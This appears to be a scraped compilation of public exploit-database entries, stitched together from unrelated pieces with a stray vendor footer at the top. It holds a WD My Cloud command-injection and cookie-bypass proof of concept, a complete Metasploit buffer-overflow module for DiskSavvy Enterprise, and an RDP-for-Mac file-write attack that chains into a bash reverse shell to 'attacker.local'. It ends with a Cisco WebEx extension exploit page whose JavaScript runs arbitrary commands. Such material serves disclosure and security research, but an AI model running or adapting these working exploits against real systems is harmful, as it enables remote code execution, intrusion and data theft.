local offices and partner network spanning 20+ countries around the globe.


Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

Twitter: @erpscan

Scoop-it: Business Application Security
'''
HireHackking 
# Exploit Title: WD My Cloud Mirror 2.11.153 RCE and Authentication Bypass
# Date: 24.01.2017
# Software Link: https://www.wdc.com
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local
 
1. Description

It’s possible to execute arbitrary commands using login form because `exec()` function is used without `escapeshellarg()`.

It's possible to bypass login form because function only check if `$_COOKIE['username']` and `$_COOKIE['isAdmin']` exist.

https://security.szurek.pl/wd-my-cloud-mirror-211153-rce-and-authentication-bypass.html

2. Proof of Concept

For RCE simply use as username:

a" || your_command_to_execute || "

For authentication bypass set COOKIES:

username=1; isAdmin=1

and then visit for example php/users.php
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DiskSavvy Enterprise GET Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability
        in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,
        caused by improper bounds checking of the request path in HTTP GET
        requests sent to the built-in web server. This module has been
        tested successfully on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'vportal',      # Vulnerability discovery and PoC
          'Gabor Seljan'  # Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '40869']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'   => "\x00\x09\x0a\x0d\x20",
          'Space'      => 500
        },
      'Targets'        =>
        [
          [
            'Automatic Targeting',
            {
              'auto' => true
            }
          ],
          [
            'DiskSavvy Enterprise v9.1.14',
            {
              'Offset' => 542,
              'Ret'    => 0x101142c0  # POP # POP # RET [libspp.dll]
            }
          ],
          [
            'DiskSavvy Enterprise v9.3.14',
            {
              'Offset' => 2478,
              'Ret'    => 0x101142ff  # POP # POP # RET [libspp.dll]
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Dec 01 2016',
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/'
    )

    if res && res.code == 200
      version = res.body[/Disk Savvy Enterprise v[^<]*/]
      if version
        vprint_status("Version detected: #{version}")
        if version =~ /9\.(1|3)\.14/
          return Exploit::CheckCode::Appears
        end
        return Exploit::CheckCode::Detected
      end
    else
      vprint_error('Unable to determine due to a HTTP connection timeout')
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    mytarget = target

    if target['auto']
      mytarget = nil

      print_status('Automatically detecting the target...')

      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => '/'
      )

      if res && res.code == 200
        if res.body =~ /Disk Savvy Enterprise v9\.1\.14/
          mytarget = targets[1]
        elsif res.body =~ /Disk Savvy Enterprise v9\.3\.14/
          mytarget = targets[2]
        end
      end

      if !mytarget
        fail_with(Failure::NoTarget, 'No matching target')
      end

      print_status("Selected target: #{mytarget.name}")
    end

    eggoptions = {
      checksum: true,
      eggtag: rand_text_alpha(4, payload_badchars)
    }

    hunter, egg = generate_egghunter(
      payload.encoded,
      payload_badchars,
      eggoptions
    )

    sploit =  make_nops(10)
    sploit << egg
    sploit << rand_text_alpha(mytarget['Offset'] - egg.length)
    sploit << generate_seh_record(mytarget.ret)
    sploit << make_nops(8)
    sploit << hunter
    sploit << rand_text_alpha(4500)

    print_status('Sending malicious request...')

    send_request_cgi(
      'method' => 'GET',
      'uri'    => sploit
    )
  end
end
HireHackking 
## Description
A vulnerability exists in Microsoft Remote Desktop for Mac that allows a remote attacker to execute arbitrary code on the target machine.
User interaction is needed to exploit this issue, but a single click on a link (sent via mail, iMessage, etc.) is sufficient to trigger the vulnerability.

## Details
Microsoft Remote Desktop Client for Mac OS X (ver 8.0.32 and probably prior) allows a malicious Terminal Server to read and write any file in the home directory of the connecting user.
The vulnerability exists to the way the application handles rdp urls. In the rdp url schema it's possible to specify a parameter that will make the user's home directory accessible to the server without any warning or confirmation request. If an attacker can trick a user to open a malicious rdp url, he/she can read and write any file within the victim's home directory.

Since Mac OS X by default opens rdp urls without confirmation (for example via Safari, Mail, Messages), a single click on a link it's sufficient to trigger the vulnerability.

According to Microsoft, no CVE will be assigned due to the release model of this particular client.

A demo video is available at https://youtu.be/6HeSiXYRpNY.

## Proof Of Concept
The following Proof Of Concept creates a directory on the victim's home and puts a file into it.
To reproduce the issue follow the steps below:

- install a windows 2008 server and allow Administrator to connect without password
- login as Administrator
- configure a trusted ssl certificate for rdp connections
- install python2.7 and put the following script in the "Startup" folder
- logout
- send the link below to a victim
RDC link:

```
rdp://full%20address=s:attacker.local&desktopwidth=i:200&desktopheight=i:200&audiomode=i:2&disable%20themes=i:1&screen%20mode%20id=i:1&devicestoredirect:s:*&drivestoredirect=s:*&redirectprinters=i:1&username=s:Administrator
```


### Python script

```
#BOF
import sys
import subprocess
import time
import os

def runcmd(cmd):
        err = None
        out = None
        try:
                process =  subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE);
                out, err = process.communicate()
        except Exception as e:
                print str(e)

        return out


while(True):
        netuse = runcmd("net use")
        if netuse.find("TSCLIENT"):
                runcmd('MKLINK /D C:\\home \\\\tsclient\\home')

                runcmd('md c:\\home\\REMOTE')

                runcmd('copy c:\\REMOTE.txt c:\\home\\REMOTE\\REMOTE.txt')

                runcmd("shutdown /l /f")
                break

        time.sleep(0.4)
#EOF
```

## Remote Code Execution
To execute arbitrary code on the target machine we can use a trick that involves ssh and ssh:// URI handler.
Consider the following example where the RDC exploit pushes the following files on the remote machine:

- `~/.ssh/known_hosts`
```
p ssh-rsa AAAAB3NzaC1yc2EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```
- `~/.ssh/config`
```
Host p
HostName p
ProxyCommand /bin/bash ~/.ssh/command.sh
```
- `~/.ssh/command.sh`
```
for a in {1..31}; do trap "" $a; done
nohup bash -i >& /dev/tcp/attacker.local/1234 0 & 
```

At this point any attempt to launch ssh://p will lead to the execution of ~/.ssh/command.sh without any warning. To automatically execute the triggering URL (ssh://p) we can either:

- send the link to the victim via Mail or iMessage
- poison Safari cache adding some javascript that launches the URL
- poison Safari "Application Saved State" so that the URL il launched at browser execuition
- poison "loginitems" to launch the URL at system startup

It's also possible achieve Remote Code Execution by sending a single link to the victim if he/she uses Safari as the default browser.

## Update
On Jan 17 2017 Apple pushed a security uptate to Safari that prevents this exploit from working.
This fix is mentioned in the Apple Store:
This update fixes an issue where a website could repeately attempt to launch other websites or applications

## Solution
Update Microsoft RDC to the latest version. The version 8.0.37 fixes this issue.
HireHackking 
<!--
Cisco's WebEx extension (jlhmfgmfgeifomenelglieieghnjghma) has ~20M active users, and is part of Cisco's popular web conferencing software.

The extension works on any URL that contains the magic pattern "cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html", which can be extracted from the extensions manifest. Note that the pattern can occur in an iframe, so there is not necessarily any user-visible indication of what is happening, visiting any website would be enough.

The extension uses nativeMessaging, so this magic string is enough for any website to execute arbitrary code (!!).

The protocol the extension uses is complicated, using CustomEvent() objects to pass JSON messages between the webpage, the extension and the native code.

Stepping through an initialization, a website must first request that the extension open a port for communication, like this:

document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }})); // token can be any string

Then messages can passed to native code via "message" events. Note that these cannot be MessageEvent() objects, and you cannot use the postMessage API, they have to be CustomEvent() objects.

There are a few different message types, such as "hello", "disconnect", etc. The most interesting is "launch_meeting":

    document.dispatchEvent(new CustomEvent("message", { detail: {
            message: JSON.stringify(msg),
            message_type: "launch_meeting",
            timestamp: (new Date()).toUTCString(),
            token: "token"
        }
    }));

I stepped through a meeting and dumped the initialization messages:

> message.message
"{"DocshowVersion": "1.0",
"FilterSecParameters": "clientparam;clientparam_value",
"GpcProductRoot": "WebEx",
"GpcMovingInSubdir": "Wanta",
"GpcProductVersion": "T30_MC",
"GpcUpgradeManagement": "false",
"GpcCompatibleDesktopClients": "",
"enableQuickLaunch": "1",
"GpcProductDescription": "V2ViRXg=",
"GpcUnpackName": "atgpcdec",
"JMTSignificantFileList": "atgpcext.dll;atmccli.dll;comui.dll;webexmgr.dll;plugin-config.xml;atmgr.exe;ieatgpc.dll;atkbctl.dll;atwbxui15.dll;atcarmcl.dll;attp.dll;atarm.dll;wbxcrypt.dll;mmssl32.dll;libeay32.dll;ssleay32.dll;atmemmgr.dll;wcldll.dll;uilibres.dll;pfwres.dll;wbxtrace.dll;mcres.dll;atresec.dll;atrestc.dll;mfs.dll;mutilpd.dll;wseclient.dll;mticket.dll;wsertp.dll",
"jmtclicklog": "1484862376664",
"GpcExtName": "atgpcext",
"GpcUnpackVersion": "27, 17, 2016, 501",
"GpcExtVersion": "3015, 0, 2016, 1117",
"GpcUrlRoot": "https://join-test.webex.com/client/WBXclient-T30L10NSP15EP1-10007/webex/self",
"GpcComponentName": "YXRtY2NsaS5ETEw=",
"GpcCompressMethod": "7z",
"GpcActiveIniSection": "V2ViRXhfVg==",
"GpcSupportPageUrl": "",
"GpcIniFileName": "Z3BjLnBocD9wbW9kdWxlcz0lN0NNQ19TVEQlN0NDaGF0JTdDUG9sbGluZyU3Q05vdGUlN0NWaWRlb1NoYXJlJTdDV2ViZXhfUkElN0NBUyU3Q1BEJk9TPVZUJnJlcGxhY2VLZXk9VklTVEElN0NTU0YmTE49JmJhc2ljbmFtZT1XZWJFeF9WJk9TX0JpdD0zMg==
...

There are a huge number of properties, many are obviously good candidates for code execution, but these jumped out at me:

"GpcComponentName": "YXRtY2NsaS5ETEw=",
"GpcInitCall": "c3pDb29raWU9SW5pdENvbnRyb2woJUhXTkQpO05hbWVWYWx1ZShMb2dnaW5nVVJMX05hbWUsTG9nZ2luZ1VSTCk7TmFtZVZhbHVlKE1lZXRpbmdJRF9OYW1lLE1lZXRpbmdJRCk7TmFtZVZhbHVlKFNlc3Npb25JRF9OYW1lLFNlc3Npb25JRCk7TmFtZVZhbHVlKEdwY0luaUZpbGVOYW1lX05hbWUsR3BjSW5pRmlsZU5hbWUpO05hbWVWYWx1ZShHcGNVcmxSb290X05hbWUsR3BjVXJsUm9vdCk7TmFtZVZhbHVlKEdwY0V4dFZlcnNpb25fTmFtZSxHcGNFeHRWZXJzaW9uKTtOYW1lVmFsdWUoR3BjVW5wYWNrVmVyc2lvbl9OYW1lLEdwY1VucGFja1ZlcnNpb24pO05hbWVWYWx1ZShHcGNQcm9kdWN0Um9vdF9OYW1lLEdwY1Byb2R1Y3RSb290KTtOYW1lVmFsdWUobG9jYWxyb290c2VjdGlvbnZlcl9OYW1lLGxvY2Fscm9vdHNlY3Rpb252ZXIpO05hbWVWYWx1ZShSZWdUeXBlX05hbWUsUmVnVHlwZSk7TmFtZVZhbHVlKEdwY1Byb2dyZXNzQmFyVGl0bGVfTmFtZSxHcGNQcm9ncmVzc0JhclRpdGxlKTtOYW1lVmFsdWUoR3BjTWVzc2FnZVRpdGxlX05hbWUsR3BjTWVzc2FnZVRpdGxlKTtOYW1lVmFsdWUoZG93bmxvYWRsb2NhbHNldHRpbmdfTmFtZSxkb3dubG9hZGxvY2Fsc2V0dGluZyk7TmFtZVZhbHVlKHByb2R1Y3RuYW1lX05hbWUscHJvZHVjdG5hbWUpO05hbWVWYWx1ZShTRlN1cHBvcnRpbmdfTmFtZSxTRlN1cHBvcnRpbmdfVmFsdWUpO05hbWVWYWx1ZShNZWV0aW5nUmFuZG9tX05hbWUsTWVldGluZ1JhbmRvbSk7TmFtZVZhbHVlKGNsaWVudHBhcmFtX05hbWUsY2xpZW50cGFyYW1fVmFsdWUpO0ZpbmlzaENhbGwoc3pDb29raWUpOw==",

If we decode those strings, we get:

GpcComponentName: "atmccli.DLL"
GpcInitCall: "szCookie=InitControl(%HWND);NameValue(LoggingURL_Name,LoggingURL);NameValue(MeetingID_Name,MeetingID);NameValue(SessionID_Name,SessionID);NameValue(GpcIniFileName_Name,GpcIniFileName);NameValue(GpcUrlRoot_Name,GpcUrlRoot);NameValue(GpcExtVersion_Name,GpcExtVersion);NameValue(GpcUnpackVersion_Name,GpcUnpackVersion);NameValue(GpcProductRoot_Name,GpcProductRoot);NameValue(localrootsectionver_Name,localrootsectionver);NameValue(RegType_Name,RegType);NameValue(GpcProgressBarTitle_Name,GpcProgressBarTitle);NameValue(GpcMessageTitle_Name,GpcMessageTitle);NameValue(downloadlocalsetting_Name,downloadlocalsetting);NameValue(productname_Name,productname);NameValue(SFSupporting_Name,SFSupporting_Value);NameValue(MeetingRandom_Name,MeetingRandom);NameValue(clientparam_Name,clientparam_Value);FinishCall(szCookie);"

That looks like some sort of weird scripting language. The presence of `HWND` suggests this is interacting with native code, and if I dump the exports of atmccli.DLL:

$ dumpbin /nologo /exports atmccli.dll

Dump of file atmccli.dll

    ordinal hint RVA      name

          2    2 0001CC11 ExitControl
         24    3 0001CC83 FinishCall
          1    4 0001D2F9 InitControl <--
         23    5 0001D556 NameValue
...

These exports look like the functions being called in that scripting language. Is it possible it's calling those exports?

I noticed that they ship a copy of the CRT (Microsoft's C Runtime, containing standard routines like printf, malloc, etc), so I tried calling the standard _wsystem() routime (like system(), but for WCHAR strings), like this:

var msg = {
    GpcProductRoot: "WebEx",
    GpcMovingInSubdir: "Wanta",
    GpcProductVersion: "T30_MC",
    GpcUnpackName: "atgpcdec",
    GpcExtName: "atgpcext",
    GpcUnpackVersion: "27, 17, 2016, 501",
    GpcExtVersion: "3015, 0, 2016, 1117",
    GpcUrlRoot: "http://127.0.0.1/",
    GpcComponentName: btoa("MSVCR100.DLL"),
    GpcSuppressInstallation: btoa("True"),
    GpcFullPage: "True",
    GpcInitCall: btoa("_wsystem(ExploitShellCommand);"),
    ExploitShellCommand: btoa("calc.exe"),
}

Unbelievably, that worked.

Example exploit attached.

I uploaded a demo here for testing (this URL is secret)

https://lock.cmpxchg8b.com/ieXohz9t/

(You can make sure WebEx is installed and working first by going here. You don't need to register, just enter any name and email)

https://www.webex.com/test-meeting.html
-->

<html>
<head>
<title>Cisco WebEx Exploit</title>
<script>
var msg = {
    GpcProductRoot: "WebEx",
    GpcMovingInSubdir: "Wanta",
    GpcProductVersion: "T30_MC",
    GpcUnpackName: "atgpcdec",
    GpcExtName: "atgpcext",
    GpcUnpackVersion: "27, 17, 2016, 501",
    GpcExtVersion: "3015, 0, 2016, 1117",
    GpcUrlRoot: "http://127.0.0.1/",
    GpcComponentName: btoa("MSVCR100.DLL"),
    GpcSuppressInstallation: btoa("True"),
    GpcFullPage: "True",
    GpcInitCall: btoa("_wsystem(ExploitShellCommand);"),
    ExploitShellCommand: btoa("calc.exe"),
}

function runcode()
{
    if (!document.location.pathname.endsWith("cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html")) {
        alert("document /must/ be named cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html");
        return;
    }

    if (!document.location.protocol.endsWith("https:")) {
        alert("document /must/ be served over https");
        return;
    }

    document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }}));
    document.dispatchEvent(new CustomEvent("message", { detail: {
            message: JSON.stringify(msg),
            message_type: "launch_meeting",
            timestamp: (new Date()).toUTCString(),
            token: "token"
        }
    }));
}
</script>
</head>
<body onload="runcode()">
<h1>Running exploit...</h1>
</body>
</html>